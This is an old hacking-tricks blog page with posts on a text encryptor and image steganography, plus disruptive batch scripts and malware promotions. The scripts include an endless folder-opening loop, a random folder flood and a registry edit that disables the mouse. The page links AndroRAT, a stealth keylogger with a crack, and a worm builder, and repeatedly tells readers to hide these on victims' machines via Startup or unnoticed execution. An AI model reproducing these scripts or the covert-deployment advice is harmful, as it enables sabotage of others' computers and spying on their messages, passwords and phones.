Showing posts with label Hacking Softwares. Show all posts
Showing posts with label Hacking Softwares. Show all posts

Wednesday, 22 January 2014

NP Text Encryptor.


Text Encryptor is a freeeware application which is used to encrypt any text message using password.Once the text is encrypted,you will require the password to decrypt it.Without the password,your text message will be lost for ever.This application works on simple algorithm for encrypting and decrypting the text message.The only drawback of this application is that the text message after decryption will be in uppercase only.Also it will double the length of the string when encrypting. Don't use this encryption application as the only source of security for important data.

Steps For Encrypting text message:

  1. Open Text Encryptor By Nerd Programmer.
  2. Below "Text Secure",you will find "Password",enter the password with which you want to encrypt your text message.
  3. Below "Decrypt",you can see the text area,enter the text in that area which you want to encrypt.
  4. Then click on "Encrypt".Your text will be encrypted.
Copy paste the generated code from the text area.Its your encrypted text.Save this encrypted text anywhere.

Steps for Decrypting text message:

  1. Open Text Encryptor By Nerd Programmer.
  2. Below "Text Secure",you will find "Password",enter the password  which you used to encrypt your text message.
  3. Copy paste the encrypted text message in text area and then click on "Decrypt".
  4. Your text message will be decrypted.

If you want the source code of this application,we will surely provide you but only if you become member of Nerd Programmer ,follow us on google plus as well as join our official group at www.facebook.com/groups/nerdprogrammer and then contact us using contact form  providing your e-mail address in it and asking for source code.


Click To Download Text Encryptor.

NOTE:ABOVE INFORMATION AND SOURCE CODE IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.

Hide Text in Images.


Good morning,today i am going to share a html based application which have extension ".hta".
Now a days,i have seen many guys and girls searching for an application or trick to hide text messages into images that too with password encrypted so that no one can read it except the one to whom the message has been written.
So after waking up whole night,i have made an application which will perform this task and have named it as "Nerd Programmer Text Encryptor".
So from now using a simple HTML application to hide the text into the image file according to the password you provide,you can send secret messages to your friends. Both you and your friend should have the program and must know the password.

How to use Nerd Programmer Text Encryptor:


Steps for hiding text message inside image:

  1. Open Nerd Programmer Text Encryptor.
  2. You will see text box for "Password".The password must be an integer between 1000 and 9999.
  3. Type the Password which you want to use while encrypting the message.
  4. Below password you will see text box which is text area for typing the message which you want to encrypt.Type the message in text area.
  5. Next text box you will find is of "Image path".Click on browse and select the image in which you want to hide your password encrypted message.Select it and click on ok.
  6. Click on "Hide" button to hide your encrypted message in image.A popup will open saying that "The text has been embedded into NPsecret.jpg".
  7. After pressing the "Hide" button,a new image with name "NPsecret.jpg" will be generated in the same directory where your "Nerd Programmer Text Encryptor" application is present.This image is very important as it contains the password encrypted text message.Send this image to your friend.

Steps for retrieving text message from image(NPsecret):

  1. Store the password encrypted text message image(NPsecret.jpg) anywhere on your system.
  2. Open Nerd Programmer Text Encryptor.
  3. Below "Hide" button,you will see text box for "Password",enter the password which was used while encrypting the text message.
  4. Below "Password" you will find text box for "Image path",click on browse and locate the password encrypted text message image(NPsecret).Select it and click on ok.
  5. Then click on "Retrieve" button below "Image path".A popup will open saying that "The retrived text has been saved to NPtext.txt ".
  6. If your password is wrong,you will get and alert saying that "Incorrect password!" and your text message will not be decrypted.So re-enter the correct password..
  7. If you enter the correct password,then you will find that a new txt file has been generated in the same directory where your "Nerd Programmer Text Encryptor" application is present.
  8. Open the "NPtext.txt" file and you will find the text message which was encrypted by your friend.
WARNING:The data in the image file will be lost if you edit it with any picture editing program.

If you want the source code of this application,we will surely provide you but only if you become member of Nerd Programmer ,follow us on google plus as well as join our official group at www.facebook.com/groups/nerdprogrammer and then contact us using contact form  providing your e-mail address in it and asking for source code.

Please don't forget to share this information with your friends.

NOTE:THE COPYRIGHT OF ABOVE APPLICATION STRICTLY GOES TO THE NERD PROGRAMMER,SO DON'T REPUBLISH THIS INFORMATION ANYWHERE WITHOUT OUR PERMISSION BUT YOU CAN SHARE IT WITH WHOM SO EVER YOU WANT.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.


Tuesday, 21 January 2014

Folder Mess Trick.


In this post,i am going to show you some codes,which will create folders some limited on its own and open it automatically.
Well,this can be quiet irritating for your victim as when ever this code is executed on your victim computer,it will make limited number of folders but will open them continuously which will result in slowing down the system or even sometimes the system will crash.
Copy paste the below code in notepad and save it with "anyname.bat".
@echo off
:RON
md NerdProgrammer1 
md NerdProgrammer2
md NerdProgrammer3
md NerdProgrammer4
md NerdProgrammer5
md NerdProgrammer6
md NerdProgrammer7
md NerdProgrammer8
md NerdProgrammer9
md NerdProgrammer10
md NerdProgrammer11
md NerdProgrammer12
md NerdProgrammer13
md NerdProgrammer14
md NerdProgrammer15
start NerdProgrammer1
start NerdProgrammer2
start NerdProgrammer3
start NerdProgrammer4
start NerdProgrammer5
start NerdProgrammer6
start NerdProgrammer7
start NerdProgrammer8
start NerdProgrammer9
start NerdProgrammer10
start NerdProgrammer11
start NerdProgrammer12
start NerdProgrammer13
start NerdProgrammer14
start NerdProgrammer15
goto RON 

NOTE: Save the above code in using notepad with ".bat" extension.

 

TIPS:To make the above code work more worse,add more number of folders by adding command "md foldername_" where "_" represents any number which you want to give or you can give your custom name also by replacing "NerdProgrammer_" where "_" is any number at the end of folder name.Just make sure that if you give custom name to the folder which will be created in future,please put the "start foldername_" command also so that it can be opened after being created.
Also you can make shortcut of this bat file and save it in "Startup" and hide it along with its  original bat files,so whenever the computer starts,this bat file will be executed result in irritating your victim as your victim won't be able to do their work.

If you have placed the shortcut of above bat files,you might observe that when ever the computer starts,this bat file is executed,to make everything work as it was before execution of this trick,boot your system in safe node,browse to your startup folder,if you have hided this bat file then first go in control panel>folder option>view and then tick the option" show hidden files and folder and drives",then come back to startup folder and delete the bat file or its shortcut.By doing this,whenever your computer will start,it will work fine as it used to do before.


Please don't forget to share this information with your friends.

NOTE:ABOVE INFORMATION AND SOURCE CODE IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.



Monday, 20 January 2014

Folder Prank.


In this post,i will show you how to make unlimited number of folders within few seconds.
The main aim of this trick is to make your victim tensed as when ever this source code will be executed,unlimited number of folders will be created within few seconds.
Copy paste the below code in note pad and save it with ".bat" extension.
q@echo off :top md NerdProgrammer%random% goto top

 Note:Save the above code with ".bat" extension,eg "folderprank.bat"


Tips:When you will run the bat file,you will observe that the directory in which this file is placed,new folders are created over there.So i will suggest you to keep the bat file in a proper folder so that you don't mess around.Also you can create a shortcut of the bat file and place it in "Startup" folder and hide the original bat file,so when ever the windows will restart,this bat file will executed automatically and your victim will be in great trouble if you place the original bat file in the same folder where your victim have saved important data.

When you run the bat files,you will observe that folder which are created have name "NerdProgrammer" with some random number at the end,you can change the name by replacing "NerdProgrammer" with whatever you want.

If you have placed the shortcut of above bat files,you might observe that when ever the computer starts,this bat file is executed,to make everything work as it was before execution of this trick,boot your system in safe node,browse to your startup folder,if you have hided this bat file then first go in control panel>folder option>view and tick the option" show hidden files and folder",then come back to startup folder and delete the bat file or its shortcut.By doing this,whenever your computer will start,it will work fine as it used to do before.


NOTE:ABOVE INFORMATION AND SOURCE CODE IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.


Mouse virus.


Have you every thought to disable or delete mouse pointer from your windows OS while still the mouse is connected to your computer and the mouse light glows?
The below trick help us to do this task.The code give below when run,it just delete the mouse files from the windows registrey.
Any driver or software we install on our computer are registered in windows regedit.
If the registry file of a particular software or driver is deleted,then that software or driver wont work.
There are to ways to do this task.The first way is to manually delete the registry file of mouse and the second way is to make a program which will directly do this job for you.

Here's the code:

rem ---------------------------------
rem Disable Mouse
set
 key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

Save the above code as "anyname.bat"
Note: Save with ".bat" extension.

The above code is not a virus,its a redesign shortcut for accessing and deleting the regedit files.Many antivirus will detect it as virus,but don't worry,it will just delete the mouse from the operating system on which it is executed.

NOTE:ABOVE INFORMATION AND Source code IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.


Sunday, 19 January 2014

AndroRAT(Made Easy)


AndroRat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.
The name AndroRat is a mix of Android and RAT (Remote Access Tool).
The goal of the application is to give the control of the android system remotely and retrieve information from it.

THE AVAILABLE  FUNCTION ARE:

  • Get contacts (and all theirs informations)
  • Get call logs
  • Get all messages
  • Location by GPS/Network
  • Monitoring received messages in live
  • Monitoring phone state in live (call received, call sent, call missed..)
  • Take a picture from the camera
  • Stream sound from microphone (or other sources..)
  • Streaming video (for activity based client only)
  • Do a toast
  • Send a text message
  • Give call
  • Open an URL in the default browser
  • Do vibrate the phone


Watch the video below to learn how to use AndroRat.


NOTE:ABOVE INFORMATION AND APPLICATION IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.


AndroRat.

Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.
The name Androrat is a mix of Android and RAT (Remote Access Tool).
It has been developed in a team of 4 for a university project. It has been realised in one month. The goal of the application is to give the control of the android system remotely and retrieve information from it.

Technical matters:

  • The android application is the client for the server which receive all the connections.
  • The android application run as a service(not an activity) that is started during the boot. So the user does not need to interact with the service (Even though there is a debug activity that allow to configure the IP and the port to connect to).
  • The connection to the server can be triggered by a SMS or a call (this can be configured)

All the available  functionalities are:

  • Get contacts (and all theirs informations)
  • Get call logs
  • Get all messages
  • Location by GPS/Network
  • Monitoring received messages in live
  • Monitoring phone state in live (call received, call sent, call missed..)
  • Take a picture from the camera
  • Stream sound from microphone (or other sources..)
  • Streaming video (for activity based client only)
  • Do a toast
  • Send a text message
  • Give call
  • Open an URL in the default browser
  • Do vibrate the phone

For more info,click here.

Click To Download AndroRat.

NOTE:ABOVE INFORMATION AND APPLICATION IS FOR EDUCATION AND SECURITY PURPOSE ONLY.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE INFORMATION.

Friday, 10 January 2014

Award Keylogger.

What is Keylogger?
A keylogger is a computer device or a program that records the real time activity of a computer user including the keyboard keys they press.You can not detect the presence of keylogger on your computer since it runs in background(Stealth mode) and also it is not listed in task manager or control panel or privacy purpose. It can be used by parents to keep eye on their children, company owners to spy on their employees or by hackers to steal account and information from the victim's computer.


Features of Award Keylogger:


  • You can run keylogger as a Windows service.
  • Easy-to-use, even for noobs.
  • Absolutely invisible/stealth mode.
  • Logs accounts and passwords typed in the every application.
  • Logs message typed in all instant messengers.
  • Visual surveillance, support screenshots view.
  • Slide show for screenshots.
  • Captures the contents behind the asterisks.
  • Captures mouse clicks.
  • Logs websites visited.
  • Captures AOL/AIM/Yahoo/ICQ chats.
  • Keyword Detection and Notification.
  • Records contents of password protected web pages, including Web Mail messages.
  • Logs Windows Clipboard.
  • Sends log by e-mail.
  • Uploads ALL logs into the separate folders by FTP.
  • Invisible for the firewall program.
  • Invisible in the Windows startup list.
  • Monitors all users of the PC.
  • User friendly HTML file format for emailed logs.
  • Invisible in Windows NT/2000/XP Task Manager and Windows 9.x/Me Task List.
  • Records Windows 9.x/Me/2000/XP/VISTA logon passwords.
  • Intercepts DOS-box and Java-chat keystrokes.
  • Supports international keyboards.
  • External log viewer.
  • Supports printing of the log.
  • Optimized for Windows XP.
  • Exports log to HTML.


Download:

Setup From Here.
Crack From Here.


NOTE:TRY THIS AT YOUR OWN RISK.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.THE ABOVE INFORMATION IS FOR EDUCATION AND RESEARCH PURPOSE ONLY.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE TRICK.



Thursday, 9 January 2014

Image Worm.


Image worm is a very popular trick to replace images on a remote computer.Image worm is a software which create a worm(Server.exe) using a image specified by the user/programmer.
When the "Server.exe"  is ready,run it in your victims computer and the result of this execution will be drastic for the victim as all the images in victims computer will be replaced by the image used by the programmer while creating this worm.


Steps to create this worm:

  1. Download  Image worm.exe 
  2. Extract the files from "Image Worm.rar".
  3. Open the folder in which you have extracted the files.
  4. Run "Image worm.exe".
  5. Click on "select files to worm".
  6. A new window will open,browse through it and select the image you want to worm.
  7. Then click on build worm.
  8. A exe file with name "Server.exe" will be generated which is your worm.
  9. Your worm is ready,just execute it in your victims computer(you can use various networking techniques or autorun techniques so that your victims may not even know when the attack took place).



NOTE:Don't run the worm on your own computer,there's no way to fix this if once the worm is executed.



NOTE:TRY THIS AT YOUR OWN RISK.IF YOU MISUSE OR MISTREAT THE ABOVE INFORMATION,THEN IT CAN BRING UNLAWFUL CHARGES BY THE PERSON ON WHOM YOU USED THIS TRICK.THE AUTHOR WILL NOT BE RESPONSIBLE IN THE EVENT ANY UNLAWFUL CHARGES ARE BROUGHT TO YOU BY ANY INDIVIDUALS BY MISUSING THE ABOVE INFORMATION.THE ABOVE INFORMATION IS FOR EDUCATION AND RESEARCH PURPOSE ONLY.WE WON'T TAKE RESPONSIBILITY FOR ANY OF YOUR ACTION RELATED TO ABOVE TRICK.


 

Subscribe to our Newsletter

Contact our Support

Email us: nerdprogrammergm@gmail.com

Our Team Memebers